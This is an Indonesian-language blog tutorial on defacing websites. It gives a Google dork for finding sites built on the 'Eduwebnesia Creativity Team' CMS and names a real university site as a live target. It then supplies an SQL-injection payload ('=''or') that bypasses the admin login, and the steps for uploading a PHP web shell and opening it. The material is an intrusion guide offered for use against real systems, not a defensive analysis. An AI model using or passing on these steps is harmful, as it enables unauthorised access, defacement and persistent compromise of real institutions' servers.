Tutorila Deface Dengan Bypass Admin

                                         "Powered By Eduwebnesia Creativity Team"
Selamat siang sobat. Hari ini saya mau berbagi tutorial tentang deface dengan method bypass admin login - SQL Injection Vuln.
Ok tidak perlu pakai lama gan tetapi saya mau ingatkan.
 Jangan deface index utama dari web,
cukup nitif file dan tutup bugnya ^_^
Ok Langkah Pertama cari web vuln dengan google dork.
DORK : intext:"Powered By Eduwebnesia Creativity Team"
Agan bisa kembangi lagi drok nya :)
Di sini saya pakai live targetnya : http://p3m.umsu.ac.id/
bila sudah mendapatkan targetnya mari kita login linknya http://p3m.umsu.ac.id/login atau http://p3m.umsu.ac.id/[Path]/login
masukan user : '=''or'  dan password : '=''or'
Liat SSnya Gan ^_^

Setelah sukses login, mari kita upload shell, liat ss gan ^_^

 Kalau sudah terupload akan muncul seperti gambar seperti dibawah ini:

 Agan klik judul dari file yang di upload lalu akan di alihkan ke page selanjutnya seperti gambar di bawah ini :

 Setelah itu kita buka shellnya di http://target.com/files/uploaded/random_namashell.php

Sekiann tutorial dari saya. Semoga bermanfaat ya. Jangna lupa share ^_^